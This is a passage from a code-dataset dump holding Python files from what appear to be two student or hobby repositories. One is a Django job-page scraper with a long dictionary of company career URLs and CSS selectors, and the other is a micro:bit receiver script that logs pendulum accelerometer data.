'scrap_params': {\n\t 'carrier_page_1' : 'div.references-teaser__button > a:nth-child(1)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'walmart': {\n\t 'search_link' : 'https://careers.walmart.com/stores-clubs/walmart-management-jobs',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > section.hero.hero--has-cta > div.container.grid.grid--spaced.grid--bottom > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'hsn': {\n\t 'search_link' : 'https://jobs.hsn.com/jobs-by-category',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > div.job-category > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'scripps': {\n\t 'search_link' : 'https://scripps.com/careers/find-a-job/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.site > section.basic-content.pb-30 > div > div > div > p:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'dinsmore': {\n\t 'search_link' : 'https://www.dinsmore.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-26544 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'ge': {\n\t 'search_link' : 'https://www.ge.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#wrapper > div.layout.container > div.inner-layout > nav.navbar.navbar-default > div > ul > li:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'irs': {\n\t 'search_link' : 'https://www.jobs.irs.gov/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-system-main-menu > ul > li.leaf',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'bostonbeer': {\n\t 'search_link' : 'http://www.bostonbeer.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-careers-2 > ul > li > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'turnerconstruction': {\n\t 'search_link' : 'http://www.turnerconstruction.com/careers/jobs',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content-side > div > strong > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'duke-energy': {\n\t 'search_link' : 'https://www.duke-energy.com/our-company/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div:nth-child(2) > section:nth-child(2) > div > footer > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'thinkchamplin': {\n\t 'search_link' : 'http://www.thinkchamplin.com/sitemap',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div > div.page__main-content > div > div > div > ul > ul:nth-child(2) > li:nth-child(1) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'lyondellbasell': {\n\t 'search_link' : 'https://careers.lyondellbasell.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#leftcolumn > div > div:nth-child(2n)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'ashland': {\n\t 'search_link' : 'https://www.ashland.com/about/careers/careers-at-ashland',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#leftColumn > div > div > p:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'lpl': {\n\t 'search_link' : 'https://careers.lpl.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'p.view-all',\n\t 
'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'sbarro': {\n\t 'search_link' : 'https://sbarro.jobs.net/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#landing-blob-section > tn-content > p:nth-child(15) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'paramount': {\n\t 'search_link' : 'https://www.paramount.com/inside-studio/studio/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-system-main > div > article > div > p:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'newscorp': {\n\t 'search_link' : 'https://newscorp.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-6669 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'key': {\n\t 'search_link' : 'https://www.key.com/about/careers.jsp',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main > article > div.page__content > div:nth-child(2) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'warnerbroscareers': {\n\t 'search_link' : 'https://www.warnerbroscareers.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-header-menu > li.menu-item.menu-item-type-post_type.menu-item-object-page.menu-item-1651 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'disneycareers': {\n\t 'search_link' : 'https://jobs.disneycareers.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > section.featured-jobs > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'warnermedia': {\n\t 'search_link' : 'https://www.att.jobs/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#category-group-warapper > div.job-keyword > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'verizon': {\n\t 'search_link' : 'https://www.verizon.com/about/work',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#search_form > div.sj_col.search_jobs__button > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'usv': {\n\t 'search_link' : 'https://www.usv.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#site-header > div.container > nav > ul.nav.nav-sections.navbar-nav.pull-right.collapse.navbar-toggleable-xs > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'pall': {\n\t 'search_link' : 'https://www.pall.com/en/careers.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div > div > div.career-link.parbase.section > section > div > section.col-33.career-link__container__content__right > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'lillianvernon': {\n\t 'search_link' : 'https://www.lillianvernon.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.page-wrapper > footer > div > div.row > div:nth-child(3) > div > div.block-content > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'tapestry': {\n\t 'search_link' : 'https://careers.tapestry.com/viewalljobs/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#categorylist > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'iac': {\n\t 'search_link' : 'https://www.iac.com/careers/overview',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#block-menu-block-1 > ul > li.menu-mlid-11662 > a',\n\t 
'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'hain': {\n\t 'search_link' : 'http://www.hain.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#purple-bg-content > div > p:nth-child(3) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'travelers': {\n\t 'search_link' : 'https://careers.travelers.com/?_ga=2.1712306.2067520576.1539166870-148981798.1539166870',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-4510 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'pentair': {\n\t 'search_link' : 'https://www.pentair.com/en/about-pentair/careers.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.sitewide-width-wrapper > main > div.main-content > div:nth-child(1) > section > article > div > div.col-xs-12.col-sm-5 > div > div.cta.parbase.section > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'infor': {\n\t 'search_link' : 'https://www.infor.com/about',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'div.splitBackground-action > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'fico': {\n\t 'search_link' : 'https://www.fico.com/en/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#nav-tab--overview-0 > div > div:nth-child(1) > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'startribune': {\n\t 'search_link' : 'https://jobs.startribune.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main > div.band.band--primary.band--primary--third.cf > div > section > div > div > ul > li',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'landolakesinc': {\n\t 'search_link' : 'https://www.landolakesinc.com/Careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#wrapper > section > div:nth-child(3) > div > div.small-12.columns.find-your-career > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'brsaerospace': {\n\t 'search_link' : 'https://brsaerospace.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-894 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'abdallahcandies': {\n\t 'search_link' : 'https://www.abdallahcandies.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#menu-item-38499 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t '3m': {\n\t 'search_link' : 'https://www.3m.com/3M/en_US/careers-us/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#pageContent > div.MMM--grids > div > div.component-control.id-Z7_79L2HO02KO83D0Q8I9A4RCI6S1 > div > div > div > div.MMM--featuredBox > div.MMM--tableGrids.MMM--tableGrids_mobile > div.MMM--tableGrids-col.MMM--tableGrids-col_50.MMM--tableGrids-col_border.MMM--tableGrids-col_omega > ul > li:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'demanddetroit': {\n\t 'search_link' : 'https://demanddetroit.com/our-company/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > comp-glue:nth-child(6) > comp-callout > inner-content > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'westbornmarket': {\n\t 'search_link' : 'https://www.westbornmarket.com/careers-westborn/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#genesis-content > article > div > div > div.wpb_column.vc_column_container.vc_col-sm-9 > div > div > div 
> div > p:nth-child(4) > a:nth-child(2)',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'quickenloans': {\n\t 'search_link' : 'https://quickenloanscareers.com/?qlsource=nav',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#single-blocks > div > div.vc_row.wpb_row.vc_row-fluid.home__hero.vc_custom_1521122111165.wpex-vc_row-has-fill > div:nth-child(1) > div > div > div:nth-child(2) > div:nth-child(2) > div > div > div.wpb_text_column.wpb_content_element.vc_custom_1545437224404.section-2-copy > div > p:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'lazboy': {\n\t 'search_link' : 'http://jobs.jobvite.com/la-z-boy-review/search?r=&d=&q=',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div > div > div > div.all-job-list > div:nth-child(1) > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'jiffymix': {\n\t 'search_link' : 'https://site.jiffymix.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#colophon > div.footer_container > div:nth-child(4) > ul > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'gm': {\n\t 'search_link' : 'http://www.fabri-kal.com/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#available-positions > div > header > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'spartanmash': {\n\t 'search_link' : 'https://careers.spartannash.com/creative/career-retail',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#content > section.copy.roles > p > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'cybexintl': {\n\t 'search_link' : 'https://www.cybexintl.com/company/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#body-container > div:nth-child(3) > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'zoomtel': {\n\t 'search_link' : 'http://www.zoomtel.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#footer_main > div > div.footer-main-menu > ul.about-zoom-menu > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'capeair': {\n\t 'search_link' : 'https://www.capeair.com/about_us/careers/index.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.container-wrapper.page-content > div > div > table > tbody > tr > td',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'starrett': {\n\t 'search_link' : 'http://www.starrett.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#ContentPlaceHolder9_TB3D0EC21005 > div > div > div > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'manulife': {\n\t 'search_link' : 'https://jobs.manulife.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#main-content > section.image-callouts.featured-careers > div > div > div',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'fidelity': {\n\t 'search_link' : 'https://jobs.fidelity.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#home-page > header > nav > div.nav-wrap.container > div > ul > li:nth-child(6) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'eatonvance': {\n\t 'search_link' : 'https://www.eatonvance.com/careers.php',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > main > div > div > center:nth-child(1) > div > div > div 
> div.col-sm-10 > div > div:nth-child(2) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'cabotcorp': {\n\t 'search_link' : 'http://www.cabotcorp.com/company/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#modules-container > div.promo-module.image.dark-text > div > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'neyer': {\n\t 'search_link' : 'https://www.neyer.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#work > div > div > div > div > div > div > div > div > div > div > div:nth-child(1) > div > div > div > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'galls': {\n\t 'search_link' : 'https://www.galls.com/pages/employment',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.main__wrapper > div > div:nth-child(2) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'qualcomm': {\n\t 'search_link' : 'https://www.qualcomm.com/company/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#qualcomm-careers > div > div.img-or-text__TextColumnContainer-sc-4fwzi7-0.fwQIjs > div.img-or-text__ColumnCtaGroup-sc-4fwzi7-5.QMWfk > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'campingworldcareers': {\n\t 'search_link' : 'http://www.campingworldcareers.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#MainContent > div.container-fluid.page-content.mb-5 > div.row.content-row.pad-bot-60 > div.col-md-12.col-lg-12.col-xl-10 > div > div:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'yum': {\n\t 'search_link' : 'https://www.yum.com/wps/portal/yumbrands/Yumbrands/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#layoutContainers > div:nth-child(2) > div > div > div > div.stControlBody.stOverflowAuto.wpthemeControlBody > div:nth-child(2) > div > div.container-fluid.hidden-xs > div > nav > section > ul > li:nth-child(5) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'tempursealy': {\n\t 'search_link' : 'https://www.tempursealy.com/careers/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div:nth-child(3) > div:nth-child(3) > div > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'rjcorman': {\n\t 'search_link' : 'https://wfa.kronostm.com/index.jsp?locale=en_US&APPLICATIONNAME=RJCormanKTMDReqExt',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#Div7',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'paducahbank': {\n\t 'search_link' : 'https://www.paducahbank.com/Learn/Company-Information/Careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#mainContent > div.categories > div > div:nth-child(1) > div.col.col-xs-12.col-sm-6.col-md-5.col-md-push-1.col-lg-4.col-lg-push-2 > div > p:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t 'lexmark': {\n\t 'search_link' : 'https://www.lexmark.com/en_us/careers.html',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 'body > div.slide-in-panel__page-container > div.par.parsys > div.row.container.section.l-pad > div.col-3-4 > div > div > div.col-1-3 > div > div:nth-child(1) > div > h3 > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'heavenhill': {\n\t 'search_link' : 'http://www.heavenhill.com/',\n\t 'scrap_params': {\n\t 'carrier_page_1' : 
'body > header > div > div > div > ul > li:nth-child(6) > ul > li:nth-child(2) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t \n\t 'fazolis': {\n\t 'search_link' : 'https://www.fazolis.jobs/index.cfm',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#navigationDiv > div:nth-child(6) > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n 'moback': {\n\t 'search_link' : 'https://www.moback.com/careers',\n\t 'scrap_params': {\n\t 'carrier_page_1' : '#root > div > div > div > div > section:nth-child(4) > p.more-link > a',\n\t 'title' : None,\n\t 'carrier_page_2' : '#menu-item-266'\n\t \n\t }\n\t },\n\t }\n\t \n\n\t\n\n\t#function for getting the carrier page information\n\tdef JobPortalData(self, company_list):\n\n\t class AppURLopener(urllib.request.FancyURLopener):\n\t version = \"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\"\n\n\t companys_list = []\n\t time.sleep(3)\n\t #print(company_list)\n\n\t Jobportal_metadata = self.Jobportal_initials[company_list]\n\t \n\t Jobportal_link = Jobportal_metadata['search_link']\n\t scrap_params = Jobportal_metadata['scrap_params']\n\t carrier_page_1 = scrap_params['carrier_page_1']\n\t title_selector = scrap_params['title']\n\t carrier_page_2 = scrap_params['carrier_page_2']\n\t opener = AppURLopener()\n\t page = opener.open(Jobportal_link)\n\t \n\t #page = requests.get(jobportal_url) \n\t time.sleep(2)\n\n\t page_soup = soup(page, 'html.parser')\n\n\t containers = page_soup.select(carrier_page_1)\n\t #print(containers) \n\t from pprint import pprint\n\n\t \n\t \n\t for container in containers:\n\t #Collecting the Company list by state wise\n\t try:\n\t link = container.a['href']\n\t #print(link)\n\t #print(\"ss\")\n\t \n\t if company_list=='accenture':\n\t link=self.accenture+link\n\n\t elif company_list=='hsn':\n\t link=self.hsn+link\n\n\t elif company_list=='irs':\n\t link=self.irs+link\n\n\t elif company_list=='lyondellbasell':\n\t link=self.lyondell+link\n\n\t elif company_list=='lpl':\n\t link=self.lpl+link\n\t \n\t elif company_list=='disneycareers':\n\t link=self.disney+link\n\t \n\t elif company_list=='warnermedia':\n\t link=self.warnermedia+link\n\t \n\t elif company_list=='tapestry':\n\t link=self.tapestry+link\n\t \n\t elif company_list=='startribune':\n\t link=self.startribune+link\n\t \n\t elif company_list=='manulife':\n\t link=self.manulife+link\n\t \n\t else :\n\t print( \" \")\n\t #print(link)\n\t except:\n\t \n\t link=container['href']\n\t #print(link)\n\t \n\t if company_list=='ebags':\n\t link=self.ebags+link\n\t \n\t elif company_list=='lovesac':\n\t link= self.lovesac+link\n\n\t elif company_list=='rhone':\n\t link= self.rhone+link\n\n\t elif company_list=='altria':\n\t link= self.altria_1+link+altria\n\n\t elif company_list=='dell':\n\t link=self.dell+link\n\n\t elif company_list=='tableau':\n\t link= self.tableau+link\n\n\t elif company_list=='arin':\n\t link= self.arin+link\n\n\t elif company_list=='jpcycles':\n\t link= self.jpcycles+link\n\n\t elif company_list=='gigaom':\n\t link= self.gigaom+link\n\t \n\t elif company_list=='zoomcare':\n\t link= self.zoomcare+link\n\n\t elif company_list=='walmart':\n\t link= self.walmart+link\n\n\t elif company_list=='thinkchamplin.':\n\t link= self.thinkchamp+link\n\t \n\t elif company_list=='sbarro':\n\t link= self.sbarro+link \n\t \n\t elif company_list=='newscorp':\n\t link= self.newscrop+link \n\t \n\t elif company_list=='key':\n\t link= self.key+link \n\t \n\t elif 
company_list=='verizon':\n\t link= self.verizon+link \n\t \n\t elif company_list=='iac':\n\t link= self.iac+link \n\t \n\t elif company_list=='masco':\n\t link= self.masco+link \n\t \n\t elif company_list=='lazboy':\n\t link= self.lazboy+link \n\t \n\t elif company_list=='jiffymix':\n\t link= self.jiffymix+link \n\t \n\t elif company_list=='spartanmash':\n\t ve=link.replace('../','/') \n\t link=self.spartanmash+ve \n\t \n\t elif company_list=='starrett':\n\t link= self.starrett+link \n\t \n\t elif company_list=='fidelity':\n\t link= self.fidelity+link \n\t \n\t elif company_list=='yum':\n\t link= self.yum+link\n\t \n\t elif company_list=='rjcorman':\n\t link= self.rjcorman+link\n\t \n\t elif company_list=='lexmark':\n\t link= self.lexmark+link\n\t \n\t elif company_list=='heavenhill':\n\t link= self.heavenhill+link\n\t elif company_list=='moback':\n\t link= self.moback+link\n\t \n\t else :\n\t print( \" \") \n\t try:\n\t if title_selector is not None:\n\t title = container.select_one(title_selector)\n\t title_text = title.text.strip('\\n').strip('\\t')\n\t else :\n\t title_text = container.text.strip('\\n').strip('\\t')\n\t \n\n\t except Exception as e:\n\t print(\"Something went wrong while fetching data\" + \\\n\t \" from \" + company_list )\n\t else :\n\t companys_list.append(link)\n\t return companys_list\n\n\n\n\n\n\n#company_names = []\n\nargs={}\n\ncompany_names=[]\ndef create_view(request):\n\n\tglobal company_names\n\n\n\tif request.method == \"POST\":\t\t\n\t\tcompany_names = request.POST['input']\n\n\t#return company_names\n\n\treturn render( request,\"inde.html\") \n\n#print()\n\"\"\"\n\n\ndef create_view(request):\n\tglobal COMPANY_LIST, args\n\t#print(request.GET)\n\t#print(request.POST)\n\t#company_namess=[]\n\n\tif request.method == \"GET\":\n\t\targs = {}\n\n\tif request.method == \"POST\":\t\t\n\t\tcompany_names = request.POST['input']\n\t#\tcompany_name.append(company_names)\n\t#\tprint(company_name)\n\t\tif company_names:\n\t\t\tcompany_class = HomePageView()\n\t\t\tcompany_list= company_names.split(\",\")\n\t\t\tfor company_list_name in company_list:\n\t\t\t\tJob_Protal_data = company_class.JobPortalData(company_list_name)\n\t\t\t\n\t\t\tCOMPANY_LIST[company_list_name] = Job_Protal_data[0]\n\t\t\t#print(COMPANY_LIST)\n\n\t\t\targs = {\"Company\":COMPANY_LIST}\n\t\telse:\n\t\t\targs = {}\n\n\n\treturn render( request,\"index.html\", args) \nprint(\"printing company names\")\t\nprint(args)\n\"\"\"\ndef create_api(request):\n\t\n\tapi_list= {\"company_name\":company_names}\n\n\n\t#COMPANY_LIST[company_list_name] = api_list[0]\n\t#print(type(api_list))\n\n\n\t#args_api = {\"Companys\":api_list}\n\t\t\n\n\treturn render(request,\"api.html\", {\"args_api\":api_list})"
},
{
"alpha_fraction": 0.762499988079071,
"alphanum_fraction": 0.762499988079071,
"avg_line_length": 19,
"blob_id": "e71ecea411e450db25a3a30d9f35966e6126ddb1",
"content_id": "62a493e0e0a19a4b61ff0befb5a8d36ce8229b58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 80,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/django/spiderapp/forms.py",
"repo_name": "venkateshmoback/spider",
"src_encoding": "UTF-8",
"text": "from django import forms\n\nclass HomePage(forms.Form):\n\tname = forms.CharField()\n"
},
{
"alpha_fraction": 0.734375,
"alphanum_fraction": 0.734375,
"avg_line_length": 18.299999237060547,
"blob_id": "9cd0e40382b28cb7fe448318a08d55631b34ad57",
"content_id": "da298b34f8c5bcac0cbd51277ee214896c02f359",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 10,
"path": "/django/spiderapp/urls.py",
"repo_name": "venkateshmoback/spider",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom django.urls import path\nfrom spiderapp import views\nfrom . import views\n\nurlpatterns = [\n\tpath('', views.create_view),\n\tpath('api/',views.create_api),\n\t\n]"
}
] | 3 |
ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica
|
https://github.com/ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica
|
9bc1968ba575e88123bf3e1076d1843e4a6fe275
|
5bf0fb403fcd54d65c7bf95d138d88f6aa42db71
|
571214b8d4ee841cbe7318b0cb8f8d1624f704df
|
refs/heads/master
| 2021-02-05T15:41:36.360510 | 2020-03-25T00:15:24 | 2020-03-25T00:15:24 | 243,799,108 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5459662079811096,
"alphanum_fraction": 0.5678548812866211,
"avg_line_length": 23.227272033691406,
"blob_id": "8e75e0d7e21780ed19bf70aa3da88b44753b09a4",
"content_id": "c87fd2ac14e1c9a961c82bd5681d17b37c6b56e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1599,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 66,
"path": "/Step 3/receiver.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "##################\n# Project 1\n# Step 3\n# Receiver.py\n#\n#\n# Jessica Nordlund\n# Faith Seely\n#################\nimport os\nimport microbit as mb\nimport radio # Needs to be imported separately\n\n\n# GLOBAL VARIABLES\n\n\n# CUSTOM FUNCTIONS\n\n\n# MAIN SCRIPT\n# path='C:/users/draw6/documents/github/project-1-faith-and-jessica/Step 3'\n# os.chdir(path) #Error saying that 'chdir' is not an attribute of 'module'\n\n# Change the channel if other microbits are interfering. (Default=7)\nradio.on() # Turn on radio\nradio.config(channel=5, length =100)\n\nprint('Program Started')\nmb.display.show(mb.Image.HAPPY, delay=1000, clear=True)\n\nfout = open('pendulum.txt', 'w')\n\n# Wait for start message before beginning printing\nincoming = ''\nwhile not incoming == 'start':\n incoming = radio.receive()\nprint('start')\n\nwhile True:\n incoming = radio.receive() # Read from radio\n\n if incoming is not None: # message was received\n mb.display.show(mb.Image.HEART, delay=100, clear=True, wait=False)\n\n #############################################################\n # FILL IN HERE\n # Incoming is string sent from logger\n # Need to parse it and reformat as a tuple for the MU plotter\n #############################################################\n info = incoming.split()\n for elem in info:\n fout.write(elem)\n fout.write(' ')\n fout.write('\\n')\n\n\n tup1 = float(info[0])\n tup2 = float(info[1])\n tup3 = float(info[2])\n tup4 = float(info[3])/1000\n\n data = (tup1, tup2, tup3, tup4)\n print(data)\n\n mb.sleep(10)\n"
},
{
"alpha_fraction": 0.5851708650588989,
"alphanum_fraction": 0.6284454464912415,
